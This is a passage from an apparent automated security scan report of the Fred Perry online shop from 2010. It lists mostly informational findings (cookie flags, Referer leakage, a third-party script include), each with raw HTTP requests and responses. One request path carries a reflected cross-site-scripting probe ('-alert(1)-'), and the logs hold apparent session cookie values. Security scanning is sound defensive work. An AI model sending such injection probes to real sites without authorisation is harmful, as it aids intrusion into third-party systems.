Severity:   Information
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /customer8c3dc%22-alert(1)-%2276794ee1910/account/

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customer8c3dc%22-alert(1)-%2276794ee1910/account/ HTTP/1.1
Host: www.fredperry.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.194CKOLO; __utma=119066206.1815755339.1289339096.1289339096.1289349290.2; __utmc=119066206; __utmb=119066206.4.10.1289349290

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 18:36:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=e1t1bajii7coiqcugmfaqqj404; expires=Tue, 09-Nov-2010 19:36:18 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Keep-Alive: timeout=3, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 29379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...

3.4. https://www.fredperry.com/sales/order/history/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /sales/order/history/

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sales/order/history/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 302 Found
Date: Tue, 09 Nov 2010 16:20:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=57m2j361l4tslk62h8uvs0na85; expires=Tue, 09-Nov-2010 17:20:05 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: https://www.fredperry.com/customer/account/login/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


4. Cross-domain Referer leakage

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/collaboration-raf-simons/

Issue detail

The page was loaded from a URL containing a query string: The response contains the following links to other domains:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

GET /limited-edition/men/collaboration-raf-simons/?SID=2hPWQxiLpIPJPjREOVJiLvolj/gt24Tjf99vflOKNYQ= HTTP/1.1
Host: www.fredperry.com
Proxy-Connection: keep-alive
Referer: http://fredperry.com/home/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.194CKOLO; __utma=119066206.1815755339.1289339096.1289339096.1289349290.2; __utmc=119066206; __utmb=119066206.3.10.1289349290

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 18:35:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=cie24rdqn57eihd36kevfoj2f2; expires=Tue, 09-Nov-2010 19:35:29 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 32743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<li>
                   <a class="nav_heading nav_head_subculture" href="http://www.fredperrysubculture.com/"><span>
...[SNIP]...
<li>
                                   <a class="first" href="http://www.fredperrysubculture.com/featured_mainpage.asp">Featured Band</a>
...[SNIP]...
<li>
                                   <a class="first" href="http://www.fredperrysubculture.com/subsonic_mainpage.asp">Sub-Sonic</a>
...[SNIP]...
<li>
                                   <a class="first" href="http://www.fredperrysubculture.com/grapevine/">Grapevine</a>
...[SNIP]...
<li>
                                   <a class="first" href="http://www.fredperrysubculture.com/gigs_mainpage.asp">Gigs</a>
...[SNIP]...
<li>
                                   <a class="first" href="http://www.fredperrysubculture.com/downloads_mainpage.asp">Downloads</a>
...[SNIP]...
<li>
                                   <a class="first" href="http://www.fredperrysubculture.com/heritage_mainpage.asp">Special</a>
...[SNIP]...
<li style="width:60px">
                                   <a class="first" href="http://www.fredperrysubculture.com/100club_mainpage.asp">100 Club</a>
...[SNIP]...
<li>
                   <a class="nav_heading nav_head_win" href="http://www.fredperrysubculture.com/competitions_mainpage.asp"><span>
...[SNIP]...
<li class="complist">
                                   <a class="first" href="http://www.fredperrysubculture.com/competitions_mainpage.asp">Early Learning Centre Vouchers - Win ..250</a>
...[SNIP]...
<li class="complist">
                                   <a class="first" href="http://www.fredperrysubculture.com/competitions_mainpage.asp">Win Mark Ronson's Record Collection</a>
...[SNIP]...
<li class="complist">
                                   <a class="first" href="http://www.fredperrytellusyourstory.com">Tell Us Your Story - Win ..5,000</a>
...[SNIP]...
<li>
                       <a href="http://www.fredperry.jp"><img src="http://www.fredperry.com/skin/frontend/default/default/images/japan-flag.gif" alt="Japanese Web Site"/>
...[SNIP]...
<br/>
                       <a href="http://www.fredperry.jp">Japanese Web Site</a>
...[SNIP]...
<p><a href="http://www.de-facto.com" title="Site by De Facto">Site by De Facto</a>
...[SNIP]...

5. Cross-domain script include

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /checkout/cart/

Issue detail

The response dynamically includes the following script from another domain:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

Request

GET /checkout/cart/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:15:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=dogceop16qjgqg80nuf0jem260; expires=Tue, 09-Nov-2010 17:15:26 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Fred Per
...[SNIP]...
<!-- END GOOGLE ANALYTICS CODE -->
<script src="http://checkout.google.com/files/digital/ga_post.js" type="text/javascript"></script>
...[SNIP]...

6. Cookie without HttpOnly flag set

There are 103 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

6.1. http://www.fredperry.com/aboutus/careers/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /aboutus/careers/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aboutus/careers/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:16:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=cgq0lrf3pfq3s1vteov0hpgkk3; expires=Tue, 09-Nov-2010 17:16:36 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Careers
...[SNIP]...

6.2. http://www.fredperry.com/aboutus/security/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /aboutus/security/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aboutus/security/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:16:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=p5vrjk00ae3sigp60d86d0v1j6; expires=Tue, 09-Nov-2010 17:16:44 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32266

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Securit
...[SNIP]...

6.3. http://www.fredperry.com/aboutus/terms/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /aboutus/terms/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aboutus/terms/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:16:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=pj3msho8s6f82o2uje94gvq8k5; expires=Tue, 09-Nov-2010 17:16:53 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Terms &
...[SNIP]...

6.4. http://www.fredperry.com/accessories/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /accessories/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accessories/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:57:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=2llo4vpr40icc0o32ncj4vuhi3; expires=Tue, 09-Nov-2010 16:57:58 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Accesso
...[SNIP]...

6.5. http://www.fredperry.com/accessories/men/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /accessories/men/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accessories/men/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:57:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=q15klass6oeeripg0sc8i35cs5; expires=Tue, 09-Nov-2010 16:57:16 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men's A
...[SNIP]...

6.6. http://www.fredperry.com/accessories/women/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /accessories/women/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accessories/women/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:57:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=uo3jmm7e988hn1037hlvckbdi0; expires=Tue, 09-Nov-2010 16:57:24 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...

6.7. http://www.fredperry.com/arcade/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /arcade/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /arcade/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:16:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=r2gh5upfm0e7q418tsuq5dtam3; expires=Tue, 09-Nov-2010 17:16:04 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Arcade
...[SNIP]...

6.8. http://www.fredperry.com/bags/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /bags/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bags/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:18:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=sg6vslisl828qekenb2fhsode2; expires=Tue, 09-Nov-2010 17:18:20 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Bags -
...[SNIP]...

6.9. http://www.fredperry.com/bags/men/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /bags/men/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bags/men/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:18:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=2pgu55mlppme62s9mtkd6m4c04; expires=Tue, 09-Nov-2010 17:18:24 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30247

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men's B
...[SNIP]...

6.10. http://www.fredperry.com/bags/women/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /bags/women/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bags/women/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:18:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9ar0n2bpe45dh7rvf2vqnrn866; expires=Tue, 09-Nov-2010 17:18:42 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30259

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...

6.11. http://www.fredperry.com/catalogsearch/ajax/suggest/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /catalogsearch/ajax/suggest/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /catalogsearch/ajax/suggest/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:17:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=tpk5ob8caaa346954v8rahjts0; expires=Tue, 09-Nov-2010 17:17:59 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 216850

<ul><li style="display:none"></li><li title="shirt" class="odd first"><span class="amount">119</span>shirt</li><li title="Bag" class="even"><span class="amount">40</span>Bag</li><li title="jacket" cla
...[SNIP]...

6.12. http://www.fredperry.com/catalogsearch/result/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /catalogsearch/result/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /catalogsearch/result/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 302 Found
